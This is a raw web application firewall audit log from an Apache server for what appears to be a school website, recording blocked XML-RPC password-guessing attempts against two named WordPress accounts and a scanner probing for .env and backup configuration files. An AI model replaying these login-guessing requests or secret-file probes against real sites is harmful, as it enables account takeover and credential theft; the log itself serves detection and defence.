Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513176014219 5906 (- - -)
Stopwatch2: 1745513176014219 5906; combined=4465, p1=578, p2=3686, p3=0, p4=0, p5=116, sr=152, sw=85, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cf365027-Z--
--f046da29-A--
[24/Apr/2025:23:47:17 +0700] aAprFclQo524fhbIj1x_TwAAAAc 103.236.140.4 43866 103.236.140.4 8181
--f046da29-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f046da29-C--
wp.getUsersBlogs
wakahumas
marketing2010_
--f046da29-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f046da29-E--
--f046da29-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513237067267 4613 (- - -)
Stopwatch2: 1745513237067267 4613; combined=3523, p1=446, p2=2917, p3=0, p4=0, p5=93, sr=91, sw=67, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f046da29-Z--
--e1e95348-A--
[24/Apr/2025:23:48:18 +0700] aAprUslQo524fhbIj1yAhQAAAAQ 103.236.140.4 46828 103.236.140.4 8181
--e1e95348-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e1e95348-C--
wp.getUsersBlogs
wakahumas
admin123456
--e1e95348-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e1e95348-E--
--e1e95348-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513298159386 4753 (- - -)
Stopwatch2: 1745513298159386 4753; combined=3699, p1=433, p2=3085, p3=0, p4=0, p5=105, sr=87, sw=76, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e1e95348-Z--
--caef6516-A--
[24/Apr/2025:23:49:18 +0700] aAprjslQo524fhbIj1yBuAAAAAc 103.236.140.4 49370 103.236.140.4 8181
--caef6516-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--caef6516-C--
wp.getUsersBlogs
wakahumas
1qaz@2wsx
--caef6516-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--caef6516-E--
--caef6516-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513358375551 17458 (- - -)
Stopwatch2: 1745513358375551 17458; combined=28556, p1=449, p2=3084, p3=0, p4=0, p5=12526, sr=92, sw=80, l=0, gc=12417
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--caef6516-Z--
--bebcfc14-A--
[24/Apr/2025:23:50:23 +0700] aAprz8lQo524fhbIj1yCgwAAAAI 103.236.140.4 52192 103.236.140.4 8181
--bebcfc14-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--bebcfc14-C--
wp.getUsersBlogs
wakahumas
qqq
--bebcfc14-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bebcfc14-E--
--bebcfc14-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513423792924 4986 (- - -)
Stopwatch2: 1745513423792924 4986; combined=3608, p1=496, p2=2952, p3=0, p4=0, p5=94, sr=95, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bebcfc14-Z--
--7827ed77-A--
[24/Apr/2025:23:51:03 +0700] aApr98lQo524fhbIj1yDCgAAAAQ 103.236.140.4 53970 103.236.140.4 8181
--7827ed77-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7827ed77-C--
wp.getUsersBlogs
wakahumas
1234%^&*
--7827ed77-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7827ed77-E--
--7827ed77-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513463917559 5216 (- - -)
Stopwatch2: 1745513463917559 5216; combined=3724, p1=447, p2=3107, p3=0, p4=0, p5=101, sr=87, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7827ed77-Z--
--e0002e74-A--
[24/Apr/2025:23:51:23 +0700] aApsC8lQo524fhbIj1yDMQAAAAQ 103.236.140.4 54822 103.236.140.4 8181
--e0002e74-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e0002e74-C--
wp.getUsersBlogs
wakahumas
ashley
--e0002e74-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e0002e74-E--
--e0002e74-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (120+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513483369646 4562 (- - -)
Stopwatch2: 1745513483369646 4562; combined=3233, p1=394, p2=2695, p3=0, p4=0, p5=84, sr=73, sw=60, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e0002e74-Z--
--617f870e-A--
[24/Apr/2025:23:52:23 +0700] aApsR_iVYlyO1xhz7yOsPQAAAM4 103.236.140.4 57540 103.236.140.4 8181
--617f870e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--617f870e-C--
wp.getUsersBlogs
wakahumas
joseph
--617f870e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--617f870e-E--
--617f870e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513543307729 4642 (- - -)
Stopwatch2: 1745513543307729 4642; combined=3247, p1=407, p2=2682, p3=0, p4=0, p5=92, sr=82, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--617f870e-Z--
--e4b4d13f-A--
[24/Apr/2025:23:53:23 +0700] aApsg_iVYlyO1xhz7yOs7wAAAMM 103.236.140.4 59954 103.236.140.4 8181
--e4b4d13f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e4b4d13f-C--
wp.getUsersBlogs
wakahumas
celtic
--e4b4d13f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e4b4d13f-E--
--e4b4d13f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513603343515 5240 (- - -)
Stopwatch2: 1745513603343515 5240; combined=3573, p1=419, p2=2973, p3=0, p4=0, p5=105, sr=91, sw=76, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e4b4d13f-Z--
--46e5be12-A--
[24/Apr/2025:23:54:23 +0700] aApsv95yz20UX9VrdZPFaQAAAFU 103.236.140.4 34306 103.236.140.4 8181
--46e5be12-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--46e5be12-C--
wp.getUsersBlogs
wakasarpras
Admin123
--46e5be12-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--46e5be12-E--
--46e5be12-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513663110036 4148 (- - -)
Stopwatch2: 1745513663110036 4148; combined=2859, p1=410, p2=2310, p3=0, p4=0, p5=81, sr=71, sw=58, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--46e5be12-Z--
--7baaec18-A--
[24/Apr/2025:23:55:23 +0700] aAps-8lQo524fhbIj1yFzwAAABE 103.236.140.4 36880 103.236.140.4 8181
--7baaec18-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 230
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7baaec18-C--
wp.getUsersBlogs
wakasarpras
Marketing2021
--7baaec18-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7baaec18-E--
--7baaec18-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513723214825 4670 (- - -)
Stopwatch2: 1745513723214825 4670; combined=3230, p1=411, p2=2672, p3=0, p4=0, p5=86, sr=84, sw=61, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7baaec18-Z--
--a7e41c40-A--
[24/Apr/2025:23:56:23 +0700] aAptN_iVYlyO1xhz7yOu_wAAAMg 103.236.140.4 39442 103.236.140.4 8181
--a7e41c40-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a7e41c40-C--
wp.getUsersBlogs
wakasarpras
Mypassword
--a7e41c40-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a7e41c40-E--
--a7e41c40-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (114+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513783024440 5095 (- - -)
Stopwatch2: 1745513783024440 5095; combined=3442, p1=398, p2=2881, p3=0, p4=0, p5=94, sr=88, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a7e41c40-Z--
--b0f60144-A--
[24/Apr/2025:23:57:28 +0700] aApteN5yz20UX9VrdZPHEgAAAE4 103.236.140.4 42136 103.236.140.4 8181
--b0f60144-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--b0f60144-C--
wp.getUsersBlogs
wakasarpras
2011
--b0f60144-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b0f60144-E--
--b0f60144-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513848256007 5102 (- - -)
Stopwatch2: 1745513848256007 5102; combined=3870, p1=447, p2=3221, p3=0, p4=0, p5=116, sr=106, sw=86, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b0f60144-Z--
--1466f707-A--
[24/Apr/2025:23:57:51 +0700] aAptj8lQo524fhbIj1yHRQAAAAA 103.236.140.4 43088 103.236.140.4 8181
--1466f707-B--
GET /.env.dev.local HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.97
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.97
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--1466f707-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1466f707-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745513871371813 696 (- - -)
Stopwatch2: 1745513871371813 696; combined=258, p1=231, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1466f707-Z--
--3094fe36-A--
[24/Apr/2025:23:57:51 +0700] aAptj2Luk3f9kLjsdTaEUQAAAIo 103.236.140.4 43114 103.236.140.4 8181
--3094fe36-B--
GET /.env.template HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.97
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.97
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--3094fe36-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3094fe36-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745513871834080 800 (- - -)
Stopwatch2: 1745513871834080 800; combined=353, p1=315, p2=0, p3=0, p4=0, p5=37, sr=136, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3094fe36-Z--
--5c782d11-A--
[24/Apr/2025:23:57:52 +0700] aAptkMlQo524fhbIj1yHRgAAAAY 103.236.140.4 43134 103.236.140.4 8181
--5c782d11-B--
GET /.env.sandbox HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.97
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.97
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--5c782d11-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5c782d11-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745513872314791 704 (- - -)
Stopwatch2: 1745513872314791 704; combined=297, p1=252, p2=0, p3=0, p4=0, p5=45, sr=82, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5c782d11-Z--
--bee1005f-A--
[24/Apr/2025:23:57:53 +0700] aAptkfiVYlyO1xhz7yOwHwAAAM8 103.236.140.4 43202 103.236.140.4 8181
--bee1005f-B--
GET /.env.bak HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.97
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.97
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--bee1005f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bee1005f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745513873769766 787 (- - -)
Stopwatch2: 1745513873769766 787; combined=308, p1=267, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
